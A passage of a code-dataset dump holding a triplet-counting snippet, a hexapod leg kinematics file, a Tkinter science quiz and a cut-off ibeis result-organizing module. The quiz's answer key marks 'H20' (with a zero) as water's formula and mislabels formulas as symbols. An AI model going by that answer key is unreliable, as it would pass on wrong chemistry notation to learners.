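The unequalTriplets solution above is O(n³); counting duplicate values gives an O(n) alternative, since every valid triplet has a unique "middle" value group contributing (elements in earlier groups) × (group size) × (elements in later groups). A sketch checked against the record's example:

```python
from collections import Counter

def unequal_triplets(nums):
    n, ans, left = len(nums), 0, 0
    for cnt in Counter(nums).values():
        right = n - left - cnt        # elements in groups not yet visited
        ans += left * cnt * right     # this group supplies the "middle" value
        left += cnt
    return ans

print(unequal_triplets([4, 4, 2, 4, 3]))   # 3, matching the brute force above
```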
math.acos((self.ltSquare + self.lfSquare - lctSquare) / (2 * self.lt * self.lf)) - math.pi\n h1 = math.acos((self.lfSquare + lctSquare - self.ltSquare) / (2 * self.lf * lct))\n h2 = math.acos((lctSquare + self.lcSquare - math.pow(np.linalg.norm(footPos[0:3]), 2)) / (2 * self.lc * lct))\n if footPos[2] < 0:\n beta = (h1 + h2) - math.pi\n else:\n beta = (math.pi - h2) + h1\n return (alpha, beta, gamma)\n\n # Hilfsmethoden\n def baseCStoLegCS(self, pos=[0, 0, 0, 1]):\n noServoOffset = np.subtract(pos, self.servoOffset)\n H = np.array([\n [math.cos(-self.rotation), -math.sin(-self.rotation), 0, -self.offset[0]],\n [math.sin(-self.rotation), math.cos(-self.rotation), 0, -self.offset[1]],\n [0, 0, 1, 0],\n [0, 0, 0, 1]])\n pos = np.dot(H, noServoOffset)\n return pos\n\n #Methoden für die COM-ROS Gruppe\n def getPosition(self):\n H = np.array([\n [math.cos(self.rotation), -math.sin(self.rotation), 0, self.offset[0]],\n [math.sin(self.rotation), math.cos(self.rotation), 0, self.offset[1]],\n [0, 0, 1, 0],\n [0, 0, 0, 1]])\n Hp = np.dot(H, self.forKinAlphaJoint(self.motors[0].getCurrentJointAngle(), self.motors[1].getCurrentJointAngle(), self.motors[2].getCurrentJointAngle()))\n posnp = np.add(Hp, self.servoOffset)\n pos = [posnp[0], posnp[1], posnp[2], 1]\n return pos\n\n def setPosition(self, pos=[0, 0, 0, 1]):\n goalAngle = self.invKinAlphaJoint(self.baseCStoLegCS(pos))\n self.motors[0].setDesiredJointAngle([goalAngle[0]])\n self.motors[1].setDesiredJointAngle([goalAngle[1]])\n self.motors[2].setDesiredJointAngle([goalAngle[2]])\n return goalAngle\n\n @staticmethod\n def convert(pos, add=False):\n if add:\n return [pos[0], pos[1], pos[2], 1]\n else:\n return pos[:-1]\n\n #Zu Testzwecken im Plotter\n def testCreateAi(self, a, alpha, d, theta):\n return np.array([\n [math.cos(theta), -math.sin(theta)*math.cos(alpha), math.sin(theta)*math.sin(alpha), a*math.cos(theta)],\n [math.sin(theta), math.cos(theta)*math.cos(alpha), -math.cos(theta)*math.sin(alpha), a*math.sin(theta)],\n [0, math.sin(alpha), math.cos(alpha), d],\n [0, 0, 0, 1]])\n\n def testPosAlpha(self):\n A0 = self.testCreateAi(self.a[0], 0, -self.a[1], 0)\n return A0\n\n def testPosBeta(self):\n A1 = self.testCreateAi(self.lc, math.pi/2, 0, self.motorAngles[0])\n return np.dot(self.testPosAlpha(), A1)\n\n def testPosGamma(self):\n A2 = self.testCreateAi(self.lf, 0, 0, self.motorAngles[1])\n return np.dot(self.testPosBeta(), A2)\n\n def testPosFoot(self):\n A3 = self.testCreateAi(self.lt, 0, 0, self.motorAngles[2])\n return np.dot(self.testPosGamma(), A3)\n","repo_name":"Alex-Edich/Hexapod","sub_path":"LEG/Leg.py","file_name":"Leg.py","file_ext":"py","file_size_in_byte":5444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"7654399250","text":"#ScienceQuiz_v7.py\r\n#Multi-choice science quiz for primary to high-school students (ages 6-18) with 3 levels of difficulties\r\n#Fredy Vesuna, 25/07/2023\r\n\r\n\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nimport random\r\n\r\n\r\nclass ScienceQuiz:\r\n def __init__(self, parent):\r\n#-------------------------------------------------------#\r\n self.options_buttons = []\r\n self.informationframe = None \r\n self.questionsframe = None\r\n self.summaryframe = None\r\n \r\n self.name_value = StringVar()\r\n self.age_value = StringVar()\r\n self.gender_value = StringVar()\r\n self.difficulty_level = StringVar()\r\n\r\n#-------------------------------------------------------#\r\n 
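`invKinAlphaJoint` in the Leg.py record above is a two-link law-of-cosines inverse kinematics wrapped in the hip rotation `alpha`. A stripped-down planar version for intuition, with a forward-kinematics round-trip check; the unit link lengths and target point are invented, and the target is assumed reachable:

```python
import math

def planar_ik(lf, lt, x, z):
    """Joint angles (beta, gamma) putting the foot of a two-link leg at (x, z).
    Assumes reachability: |lf - lt| <= sqrt(x*x + z*z) <= lf + lt."""
    d2 = x * x + z * z
    gamma = math.acos((lf * lf + lt * lt - d2) / (2 * lf * lt)) - math.pi   # knee
    beta = math.atan2(z, x) + math.acos(
        (lf * lf + d2 - lt * lt) / (2 * lf * math.sqrt(d2)))                # femur
    return beta, gamma

beta, gamma = planar_ik(1.0, 1.0, 1.5, -0.5)
# forward-kinematics round trip: recompute the foot position
x = math.cos(beta) + math.cos(beta + gamma)
z = math.sin(beta) + math.sin(beta + gamma)
print(round(x, 6), round(z, 6))    # 1.5 -0.5
```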
\r\n#----------------------------------------------------------------- Configuring the Widgets for HomeFrame -------------------------------------------------------------#\r\n self.homeframe = Frame(parent)\r\n self.homeframe.grid(row = 0, column = 0)\r\n\r\n self.headinglabel = Label(self.homeframe, bg = \"dodgerblue\", fg = \"black\", width = 70, padx = 40, pady = 20, text = \"WELCOME TO THE SCIENCE QUIZ 2023\", font = (\"Times New Roman\", \"16\", \"bold\"))\r\n self.headinglabel.grid(columnspan = 5)\r\n\r\n self.descriptionlabel = Label(self.homeframe, fg = \"black\", width = 35, padx = 300, pady = 10, text = \"\"\"\r\n This is an academic quiz for a purpose to gain intellectual knowledge on science. The quiz will be multichoice with\r\n 3 different difficulties (easy, medium and hard). My target users for the quiz are for any ages.\r\n This is because the quiz is appropriate for anyone to access and should be accessible to any age.\r\n The purpose of the science quiz to create an increase in popularity of science.\r\n This is for people who are interested in science and want to challenge their knowledge by completing\r\n a quiz or if who is new to science and want to test their knowledge after studing or learning the science topic.\"\"\", font = (\"Times New Roman\", \"12\"))\r\n self.descriptionlabel.grid (column = 0)\r\n\r\n self.submit = ttk.Button(self.homeframe, text=\"Participate and Enter Your Details!\", command=self.show_information_frame)\r\n self.submit.grid(row=11, column=1)\r\n\r\n#---------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n def show_information_frame(self):\r\n#-------------------------------------------------------#\r\n if self.questionsframe:\r\n self.questionsframe.destroy()\r\n if self.informationframe:\r\n self.informationframe.destroy()\r\n\r\n self.options_buttons.clear()\r\n \r\n if self.homeframe:\r\n self.homeframe.grid_forget()\r\n#-------------------------------------------------------#\r\n\r\n#--------------------------------------------------------- Configuring the Widgets for InformationFrame -------------------------------------------------------------# \r\n self.informationframe = Frame(root)\r\n self.informationframe.grid(row=0, column=0)\r\n\r\n self.headinglabel = Label(self.informationframe, bg = \"light green\", fg = \"black\", width = 40, padx = 40, pady = 20, text = \"ENTER YOUR INFORMATION\", font = (\"Times New Roman\", \"16\", \"bold\"))\r\n self.headinglabel.grid(columnspan = 5)\r\n \r\n self.namelabel = Label(self.informationframe, text = \" Enter your first name:\", width = 60, font = (\"Calibri\", \"11\", \"bold\"))\r\n self.namelabel.grid(row = 2, column = 0, sticky = N)\r\n\r\n self.name = StringVar()\r\n self.name.set(\"\")\r\n self.nameentry = ttk.Entry(self.informationframe, textvariable = self.name_value, width = 25)#The text box for the user to enter their name with ttk/\r\n self.nameentry.grid(row = 3, column = 0, sticky = N)\r\n\r\n self.agelabel = Label(self.informationframe, text = \"Enter your age:\", width = 21, font = (\"Calibri\", \"11\", \"bold\"))\r\n self.agelabel.grid(row = 4, column = 0, sticky = N,)\r\n\r\n self.age = StringVar()\r\n self.age.set(\"\")\r\n self.ageentry = ttk.Entry(self.informationframe, width = 25, textvariable = self.age_value)\r\n self.ageentry.grid(row = 5, column = 0, sticky = N)\r\n\r\n self.genderlabel = Label(self.informationframe, text = \"Enter your gender:\", 
width = 24, font = (\"Calibri\", \"11\", \"bold\"))\r\n self.genderlabel.grid(row = 6, column = 0, sticky = N)\r\n\r\n select_gender = [\"Male\", \"Female\", \"Other\"]\r\n\r\n self.gender = ttk. Combobox (self.informationframe, values = select_gender, width = 22, state = \"readonly\", textvariable=self.gender_value)\r\n self.gender.grid(row = 7, column = 0, sticky = N)\r\n\r\n self.difficultylabel = Label(self.informationframe, text = \"Which difficulty would you like to choose:\", width = 55, padx = 60, pady = 10, font = (\"Times New Roman\", \"16\", \"bold underline\"))\r\n self.difficultylabel.grid(row = 12, column = 0, sticky = N)\r\n\r\n self.difficulty = [\"Easy Quiz\", \"Medium Quiz\", \"Hard Quiz\"]\r\n self.difficulty_level = StringVar()\r\n self.difficulty_level.set(0)\r\n self.difficulty_buttons = []\r\n\r\n \r\n for i in range (len(self.difficulty)):\r\n button = ttk.Radiobutton(self.informationframe, variable = self.difficulty_level, value = i, text = self.difficulty[i], width = \"40\")\r\n self.difficulty_buttons.append(button)\r\n button.grid(row = i+14, column = 0, sticky = N)\r\n\r\n self.submit = ttk.Button(self.informationframe, text=\"Proceed to the Questions!\", command= self.show_questions_frame)\r\n self.submit.grid(row=20, column=0)\r\n\r\n self.back_to_home_button = ttk.Button(self.informationframe, text=\"Back to Home\", command=self.show_home_frame)\r\n self.back_to_home_button.grid(row=21, column=0)\r\n\r\n#---------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n \r\n#-------------------------------------------------------- Configuring Method to Check User's Information -------------------------------------------------------------#\r\n def validate_input(self):\r\n name = self.name_value.get().strip()\r\n age = self.age_value.get().strip()\r\n gender = self.gender_value.get()\r\n\r\n if not name:\r\n messagebox.showerror(\"Input Error\", \"Error: Please enter a valid name.\")\r\n return False\r\n\r\n if not name.isalpha():\r\n messagebox.showerror(\"Input Error\", \"Error: Name can only contain letters.\")\r\n return False\r\n\r\n if not age:\r\n messagebox.showerror(\"Input Error\", \"Error: Please enter your age.\")\r\n return False\r\n\r\n try:\r\n age = int(age)\r\n except ValueError:\r\n messagebox.showerror(\"Input Error\", \"Error: Please enter a valid age.\")\r\n return False\r\n\r\n if age < 6 or age > 18:\r\n messagebox.showerror(\"Input Error\", \"Error: You are too young or too old to particpate.\")\r\n quit()\r\n\r\n if not gender:\r\n messagebox.showerror(\"Inputer Error\", \"Error: Please select your gender.\")\r\n return False\r\n \r\n return True\r\n\r\n#---------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n#------------------------------------------------------------------- Configuring Method to Show Questions Frame ------------------------------------------------------#\r\n def show_questions_frame(self):\r\n if not self.validate_input():\r\n return\r\n\r\n if self.informationframe:\r\n self.informationframe.destroy()\r\n if self.questionsframe:\r\n self.questionsframe.destroy()\r\n\r\n if self.homeframe:\r\n self.homeframe.grid_forget()\r\n\r\n\r\n self.questionsframe = Frame(root, padx=20, pady =20)\r\n self.index = 0\r\n self.score = 0\r\n self.questionsframe.grid(row=0, 
column=0)\r\n#---------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n\r\n#--------------------------------------------------------------------- Configuring the Widgets for QuestionFrame ----------------------------------------------------#\r\n self.headinglabel = Label(self.questionsframe, bg = \"lightgrey\", fg = \"green\", width = 50, padx = 40, pady = 20, text = \"SCIENCE QUIZ QUESTIONS\", font = (\"Times New Roman\", \"16\", \"bold\"))\r\n self.headinglabel.grid(row = 0, columnspan = 3)\r\n \r\n#--------------------------------------------------------------------------------------------------------------------\r\n selected_difficulty = int(self.difficulty_level.get())\r\n\r\n question_banks = [\r\n \r\n [\r\n {\r\n \"question\": \"What is the chemical symbol for water?\",\r\n \"options\": [\"H20\", \"CO2\", \"NaC1\", \"02\"],\r\n \"correct_answer\": \"H20\"\r\n },\r\n\r\n {\r\n \"question\": \"What is the name of the table where you can find all the chemcial elements?\",\r\n \"options\": [\"Element Table\", \"Periodic Table\", \"Science Table\", \"Chemical Table\"],\r\n \"correct_answer\": \"Periodic Table\"\r\n },\r\n\r\n {\r\n \"question\": \"What does DNA stand for?\",\r\n \"options\": [\"Digestion nitrogen acid\", \"Deoxyribonucleic acid\", \"Distribution negative acid\", \"Distribution negative arragment\"],\r\n \"correct_answer\": \"Deoxyribonucleic acid\"\r\n },\r\n\r\n {\r\n \"question\": \"What are the 3 states for matter?\",\r\n \"options\": [\"Salt, Lice, Gas\", \"Side, Liquid, Gas\", \"Solid, Liquid, Green\", \"Solid, Liquid, Gas\"],\r\n \"correct_answer\": \"Solid, Liquid, Gas\"\r\n },\r\n\r\n {\r\n \"question\": \"What is the chemcial symbol for hydrogen?\",\r\n \"options\": [\"H\", \"Na\", \"C\", \"He\"],\r\n \"correct_answer\": \"H\"\r\n }, \r\n \r\n ],\r\n \r\n [\r\n {\r\n \"question\": \"What is the largest planet in our solar system?\",\r\n \"options\": [\"Mars\", \"Jupiter\", \"Venus\", \"Saturn\"],\r\n \"correct_answer\": \"Jupiter\"\r\n },\r\n\r\n {\r\n \"question\": \"Who invented the telephone?\",\r\n \"options\": [\"Alexander Graham Bell\", \"Albert Einstein\", \"Charles Darwin\", \"Rosalind Franklin\"],\r\n \"correct_answer\": \"Alexander Graham Bell\"\r\n },\r\n\r\n {\r\n \"question\": \"Which is not a form of carbon?\",\r\n \"options\": [\"Diamond\", \"Graphite\", \"Amorphous Carbon\", \"Ferrite\"],\r\n \"correct_answer\": \"Ferrite\"\r\n },\r\n\r\n {\r\n \"question\": \"What is the lightest elemet in the periodic table?\",\r\n \"options\": [\"Helium\", \"Hydrogen\", \"Carbon\", \"Nitrogen\"],\r\n \"correct_answer\": \"Hydrogen\"\r\n },\r\n\r\n {\r\n \"question\": \"What energy emerges from motion?\",\r\n \"options\": [\"Potential Energy\", \"Electrical Energy\", \"Kinetic Energy\", \"Consistent Energy\"],\r\n \"correct_answer\": \"Kinetic Energy\"\r\n },\r\n \r\n ],\r\n\r\n [\r\n {\r\n \"question\": \"Who proposed the theory of general relativity?\",\r\n \"options\": [\"Albert Einstein\", \"Isaac Newotn\", \"Stephen Hawking\", \"Galileo Galilei\"],\r\n \"correct_answer\": \"Albert Einstein\"\r\n },\r\n\r\n {\r\n \"question\": \"What is the smallest planet in our solar system?\",\r\n \"options\": [\"Saturn\", \"Venus\", \"Mercury\", \"Neptune\"],\r\n \"correct_answer\": \"Mercury\"\r\n },\r\n\r\n {\r\n \"question\": \"What is the chemical symbol for table salt?\",\r\n \"options\": [\"S\", \"NaCl\", \"NH4F\", \"H2O\"],\r\n 
\"correct_answer\":\"NaCl\"\r\n },\r\n\r\n {\r\n \"question\": \"What is the normal pH level of human blood?\",\r\n \"options\": [\"7.40\", \"5\", \"6.40\", \"2.3\"],\r\n \"correct_answer\":\"7.40\"\r\n },\r\n\r\n {\r\n \"question\": \"Which of the following planet was first discovered by the telescope?\",\r\n \"options\": [\"Uranus\", \"Venus\", \"Jupitar\", \"Saturn\"],\r\n \"correct_answer\":\"Uranus\"\r\n },\r\n \r\n ]\r\n ]\r\n\r\n self.selected_questions = random.sample(question_banks[selected_difficulty], 5)\r\n\r\n self.questions = [q[\"question\"] for q in self.selected_questions]\r\n self.correct_answers =[q[\"correct_answer\"] for q in self.selected_questions]\r\n\r\n self.current_question_var = IntVar()\r\n self.current_question_var.set(1)\r\n\r\n self.question_label = Label(self.questionsframe, text=self.questions[0], font=(\"Times New Roman\", 12), wraplength = 400, justify = \"center\") \r\n self.question_label.grid (row=1, column=0, columnspan=3, padx=10, pady=10)\r\n\r\n self.options_var = StringVar()\r\n self.options_var.set(None)\r\n for i, option in enumerate(self.selected_questions[0][\"options\"]):\r\n rb = Radiobutton(self.questionsframe, text=option, variable=self.options_var, value=option, font=(\"Times New Roman\",10))\r\n rb.grid(row=i+2, column=1, columnspan=1, padx=10, pady=5, sticky=W)\r\n self.options_buttons.append(rb)\r\n\r\n#----------------------------------------------------------------------------------------------------------------------------\r\n self.submit_button = ttk.Button(self.questionsframe, text = \"Submit\", command=self.check_answer)\r\n self.submit_button.grid(row=7, column =0, columnspan=3, pady=10)\r\n\r\n self.feedback_label= Label(self.questionsframe, text = \"\", font=(\"Times New Roman\", 12), wraplength=600, justify=\"center\")\r\n self.feedback_label.grid(row=8, column=0, columnspan=3, padx=10, pady=10)\r\n\r\n self.back_to_information_button = ttk.Button(self.questionsframe, text=\"Back to Information\", command=self.show_information_frame)\r\n self.back_to_information_button.grid(row=8, column=1)\r\n\r\n self.back_to_home_button = ttk.Button(self.questionsframe, text=\"Back to Home\", command=self.show_home_frame)\r\n self.back_to_home_button.grid(row=9, column=1)\r\n#-----------------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\n#---------------------------------------------------------- Configuring Method to the Check User's Answers -----------------------------------------------------------#\r\n def check_answer(self):\r\n user_answer = self.options_var.get()\r\n current_question_index = self.current_question_var.get() - 1\r\n\r\n if user_answer:\r\n correct_answer = self.correct_answers[current_question_index]\r\n\r\n if user_answer == correct_answer:\r\n self.score += 1\r\n\r\n self.feedback_label.config(text=f\"Your answer is {'correct!' 
if user_answer == correct_answer else 'incorrect!'}\")\r\n self.feedback_label.grid(row = 8, column = 2)\r\n self.current_question_var.set(current_question_index + 2) # Move to the next question\r\n\r\n \r\n if current_question_index == len(self.questions) - 1:\r\n self.show_summary_frame()\r\n else:\r\n self.show_next_question()\r\n#---------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n#-------------------------------------------------------- Configuring Method for User to Move on to Next Question ----------------------------------------------------#\r\n def show_next_question(self):\r\n current_question_index = self.current_question_var.get() - 1\r\n self.question_label.config(text=self.questions[current_question_index])\r\n\r\n #Destroy the old radio buttons (if any) for the restart\r\n for rb in self.options_buttons:\r\n rb.destroy()\r\n\r\n self.options_buttons.clear()\r\n\r\n\r\n for i, option in enumerate(self.selected_questions[current_question_index][\"options\"]):\r\n rb = Radiobutton(self.questionsframe, text=option, variable=self.options_var, value=option, font=(\"Times New Roman\", 10))\r\n rb.grid(row=i + 2, column=1, columnspan=1, padx=10, pady=5, sticky=W)\r\n self.options_buttons.append(rb)\r\n#---------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n#----------------------------------------------------------- Configuring Widgets for the SummaryFrame ----------------------------------------------------------------#\r\n def show_summary_frame(self):\r\n if self.questionsframe:\r\n self.questionsframe.destroy()\r\n\r\n if self.summaryframe:\r\n self.summaryframe.destroy()\r\n\r\n self.summaryframe = Frame(root, padx=20, pady=20)\r\n self.summaryframe.grid(row=0, column=0)\r\n\r\n summary_page = [\"Name\", \"Age\", \"Gender\", \"Score\"]\r\n self.summaryframe_labels = []\r\n\r\n for i in range(len(summary_page)):\r\n heading = Label(self.summaryframe, text=summary_page[i], anchor=W, width=15, bg=\"lightblue\", font=(\"Arial\", 14, \"bold\"))\r\n self.summaryframe_labels.append(heading)\r\n heading.grid(row=1, column=i, sticky=\"EW\")\r\n\r\n self.summary_name = Label(self.summaryframe, text=self.name_value.get(), bg=\"lightblue\")\r\n self.summary_name.grid(row=3, column=0, sticky=\"EW\")\r\n\r\n self.summary_age = Label(self.summaryframe, text=self.age_value.get(), bg=\"lightblue\")\r\n self.summary_age.grid(row=3, column=1, sticky=\"EW\")\r\n\r\n self.summary_gender = Label(self.summaryframe, text=self.gender_value.get(), bg=\"lightblue\")\r\n self.summary_gender.grid(row=3, column=2, sticky=\"EW\")\r\n\r\n self.summary_score = Label(self.summaryframe, text=str(self.score) + \"/5\", bg=\"lightblue\")\r\n self.summary_score.grid(row=3, column=3, sticky=\"EW\")\r\n\r\n self.restart_button = ttk.Button(self.summaryframe, text=\"Restart Quiz\", command=self.restart_quiz)\r\n self.restart_button.grid(row=4, column=1, padx=5, pady=10)\r\n\r\n self.quit_button = ttk.Button(self.summaryframe, text=\"Quit\", command=self.quit_quiz)\r\n self.quit_button.grid(row=4, column=2, padx=5, pady=10)\r\n\r\n#---------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n\r\n#----------------------------------------------------------- Configuring 
Method to allow User to Go Back -------------------------------------------------------------#\r\n def show_home_frame(self):\r\n if self.questionsframe:\r\n self.questionsframe.destroy()\r\n if self.informationframe:\r\n self.informationframe.destroy()\r\n if self.homeframe:\r\n self.homeframe.grid(row=0, column=0)\r\n#---------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n\r\n#-------------------------------------------------------- Configuring Methods to allow User to Restart or Quit the Quiz ----------------------------------------------#\r\n\r\n def restart_quiz(self):\r\n if self.summaryframe:\r\n self.summaryframe.destroy()\r\n\r\n # Reset all variables\r\n self.name_value.set(\"\")\r\n self.age_value.set(\"\")\r\n self.gender_value.set(\"\")\r\n self.difficulty_level.set(0)\r\n\r\n # Reset radio button selection\r\n self.difficulty_level.set(None)\r\n \r\n # Destroy questionsframe and informationframe if they exist\r\n if self.questionsframe:\r\n self.questionsframe.destroy()\r\n if self.informationframe:\r\n self.informationframe.destroy()\r\n\r\n # Go back to the homeframe\r\n self.show_home_frame()\r\n\r\n def quit_quiz(self):\r\n root.destroy()\r\n\r\n#--------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n \r\n\r\n#Main routine - This will run the script as the main module and the name of the parent window (root)\r\n#__name__ is a variable defined for each script\r\nif __name__ == \"__main__\":\r\n root = Tk()\r\n #This is the title of my GUI quiz\r\n root.title(\"Science Quiz 2023\")\r\n GUI = ScienceQuiz(root)\r\n root.mainloop()\r\n \r\n","repo_name":"FredyVesuna/3DIP---Fredy-Vesuna","sub_path":"ScienceQuiz_v7.py","file_name":"ScienceQuiz_v7.py","file_ext":"py","file_size_in_byte":21600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19772243957","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDEPRICATE:\n Use TestResult instead\nnot really used\nmost things in here can be depricated\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\nimport six\nimport utool as ut # NOQA\nfrom six.moves import zip\nimport numpy as np\nimport utool\nfrom utool import DynStruct\nprint, rrr, profile = utool.inject2(__name__, '[resorg]', DEBUG=False)\n\n\n#\n#\n# OrganizedResult Class\n#---------------------\n\nclass OrganizedResult(DynStruct):\n \"\"\"\n What chips are populated depends on the type of organization\n\n Notes:\n Maintains an organized list of:\n * query annotation indexes\n * their top matching result\n * their score\n * their rank\n \"\"\"\n def __init__(self, orgtype=''):\n super(DynStruct, self).__init__()\n self.orgtype = orgtype\n self.qaids = [] # query annotation indexes\n self.aids = [] # a matching result\n self.scores = [] # the matching score\n self.ranks = [] # the matching rank\n\n def append(self, qaid, aid, rank, score): # , num_fm):\n self.qaids.append(qaid)\n self.aids.append(aid)\n self.scores.append(score)\n self.ranks.append(rank)\n #self.num_matches.append(num_fm)\n\n def freeze(self):\n \"\"\" No more appending \"\"\"\n self.qaids = np.array(self.qaids)\n self.aids = np.array(self.aids)\n self.scores = np.array(self.scores)\n self.ranks = np.array(self.ranks)\n\n def where_ranks_lt(orgres, num):\n \"\"\" get new orgres where all the ranks are less 
or equal to \"\"\"\n # Remove None ranks\n return _where_ranks_lt(orgres, num)\n\n def iter_sorted(self):\n qaids = np.array(self.qaids)\n aids = np.array(self.aids)\n scores = np.array(self.scores)\n ranks = np.array(self.ranks)\n #\n sortx = ranks.argsort()\n sorted_qaids = qaids[sortx]\n sorted_aids = aids[sortx]\n sorted_scores = scores[sortx]\n sorted_ranks = ranks[sortx]\n return (sorted_qaids, sorted_aids, sorted_scores, sorted_ranks)\n\n def __len__(self):\n num_qcxs = len(self.qaids)\n num_aids = len(self.aids)\n num_scores = len(self.scores)\n num_ranks = len(self.ranks)\n assert num_qcxs == num_aids\n assert num_aids == num_scores\n assert num_scores == num_ranks\n return num_qcxs\n\n def iter(self):\n \"\"\" useful for plotting \"\"\"\n result_iter = zip(self.qaids, self.aids, self.scores, self.ranks)\n for qaid, aid, score, rank in result_iter:\n yield qaid, aid, score, rank\n\n def printme3(self):\n column_list = [self.qaids, self.aids, self.scores, self.ranks]\n column_lbls = ['qaids', 'aids', 'scores', 'ranks']\n header = 'Orgres %s' % (self.orgtype)\n csvstr = utool.make_csv_table(column_list, column_lbls, header, column_type=None)\n print(csvstr)\n\n\ndef _where_ranks_lt(orgres, num):\n \"\"\" get new orgres where all the ranks are less or equal to \"\"\"\n # Remove None ranks\n isvalid = [rank is not None and rank <= num and rank != -1\n for rank in orgres.ranks]\n orgres2 = OrganizedResult(orgres.orgtype + ' < %d' % num)\n orgres2.qaids = utool.filter_items(orgres.qaids, isvalid)\n orgres2.aids = utool.filter_items(orgres.aids, isvalid)\n orgres2.scores = utool.filter_items(orgres.scores, isvalid)\n orgres2.ranks = utool.filter_items(orgres.ranks, isvalid)\n return orgres2\n\n\ndef _sorted_by_score(orgres):\n \"\"\" get new orgres where arrays are sorted by score \"\"\"\n orgres2 = OrganizedResult(orgres.orgtype + ' score-sorted')\n sortx = np.array(orgres.scores).argsort()[::-1]\n orgres2.qaids = np.array(orgres.qaids)[sortx]\n orgres2.aids = np.array(orgres.aids)[sortx]\n orgres2.scores = np.array(orgres.scores)[sortx]\n orgres2.ranks = np.array(orgres.ranks)[sortx]\n return orgres2\n\n\ndef _score_sorted_ranks_lt(orgres, num):\n orgres2 = _where_ranks_lt(orgres, num)\n orgres3 = _sorted_by_score(orgres2)\n return orgres3\n\n\ndef qres2_true_and_false(ibs, qres):\n \"\"\"\n TODO: generic metrics such as columns of fsv or num feature matches\n\n\n Organizes chip-vs-chip results into true positive set and false positive set\n a set is a query, its best match, and a score\n\n Args:\n ibs (IBEISController): ibeis controller object\n qres (QueryResult): object of feature correspondences and scores\n\n Returns:\n tuple: (true_tup, false_tup)\n true_tup (tuple): (true_aids, true_scores, true_ranks)\n false_tup (tuple): (false_aids, false_scores, false_ranks)\n\n CommandLine:\n python -m ibeis.expt.results_organizer --test-qres2_true_and_false\n\n Example:\n >>> # SLOW_DOCTEST\n >>> from ibeis.expt.results_organizer import * # NOQA\n >>> import ibeis\n >>> ibs = ibeis.opendb('PZ_MTEST')\n >>> aid_list = ibs.get_valid_aids()\n >>> cfgdict = dict()\n >>> qaid_list = aid_list[0:1]\n >>> qaid2_qres = ibs._query_chips4(qaid_list, aid_list, cfgdict=cfgdict)\n >>> qres = qaid2_qres[qaid_list[0]]\n >>> (true_tup, false_tup) = qres2_true_and_false(ibs, qres)\n >>> print(true_tup)\n >>> print(false_tup)\n \"\"\"\n # Get top chip indexes and scores\n top_aids = qres.get_top_aids()\n top_score = qres.get_aid_scores(top_aids)\n top_ranks = range(len(top_aids))\n # True Rids / Scores / 
Ranks\n true_ranks, true_aids = qres.get_gt_ranks(ibs=ibs, return_gtaids=True)\n true_scores = [-1 if rank is None else top_score[rank] for rank in true_ranks]\n # False Rids / Scores / Ranks\n false_ranks = list(set(top_ranks) - set(true_ranks))\n false_aids = [-1 if rank is None else top_aids[rank] for rank in false_ranks]\n false_scores = [-1 if rank is None else top_score[rank] for rank in false_ranks]\n # Construct the true positive tuple\n NEW = True\n if NEW:\n def sort_tup(tup):\n # Sort tup by rank\n (aids, scores, ranks) = tup\n aids = np.array(aids)\n scores = np.array(scores)\n ranks = np.array(ranks)\n sortx = scores.argsort()[::-1]\n sorted_aids = aids[sortx].tolist()\n sorted_scores = scores[sortx].tolist()\n sorted_ranks = ranks[sortx].tolist()\n sorted_tup = (sorted_aids, sorted_scores, sorted_ranks)\n return sorted_tup\n true_tup = sort_tup((true_aids, true_scores, true_ranks))\n false_tup = sort_tup((false_aids, false_scores, false_ranks))\n else:\n true_tup = (true_aids, true_scores, true_ranks)\n false_tup = (false_aids, false_scores, false_ranks)\n # Return tuples\n return true_tup, false_tup\n\n\ndef organize_results(ibs, qaid2_qres):\n \"\"\"\n Sorts query result annotations, score, and ranks.\n\n Returns:\n dict: orgres - contains OrganizedResult object of various types\n\n CommandLine:\n ib\n python dev.py -t scores --db PZ_MTEST --allgt -w --show\n python dev.py -t scores --db PZ_MTEST --allgt -w --show --cfg codename='vsone' fg_on:True --index 0:3\n python dev.py -t scores --db PZ_MTEST --allgt -w --show --cfg fg_on:True\n python dev.py -t scores --db GZ_ALL --allgt -w --show --cfg fg_on:True\n python dev.py -t scores --db GZ_ALL --allgt -w --show\n\n CommandLine:\n python -m ibeis.expt.results_organizer --test-organize_results\n\n Example:\n >>> # SLOW_DOCTEST\n >>> from ibeis.expt.results_organizer import * # NOQA\n >>> import ibeis\n >>> ibs = ibeis.opendb('PZ_MTEST')\n >>> daid_list = ibs.get_valid_aids()\n >>> qaid_list = daid_list[20:60:2]\n >>> cfgdict = dict()\n >>> qaid2_qres = ibs._query_chips4(qaid_list, daid_list, cfgdict=cfgdict)\n >>> orgres = organize_results(ibs, qaid2_qres)\n >>> #orgres['true'].printme3()\n >>> #orgres['false'].printme3()\n >>> orgres['top_true'].printme3()\n >>> orgres['top_false'].printme3()\n >>> orgres['rank0_true'].printme3()\n >>> orgres['rank0_false'].printme3()\n \"\"\"\n print('[results_organizer] organize_results()')\n org_true = OrganizedResult('true')\n org_false = OrganizedResult('false')\n org_top_true = OrganizedResult('top_true') # highest ranked true matches\n org_top_false = OrganizedResult('top_false') # highest ranked false matches\n org_bot_true = OrganizedResult('bot_true')\n org_problem_true = OrganizedResult('problem_true')\n org_problem_false = OrganizedResult('problem_false')\n org_rank0_true = OrganizedResult('rank0_true')\n org_rank0_false = OrganizedResult('rank0_false')\n\n def _organize_result(qres):\n # Use ground truth to sort into true/false\n # * true_tup = (true_aids, true_scores, true_ranks)\n # * false_tup = (false_aids, false_scores, false_ranks)\n true_tup, false_tup = qres2_true_and_false(ibs, qres)\n last_rank = 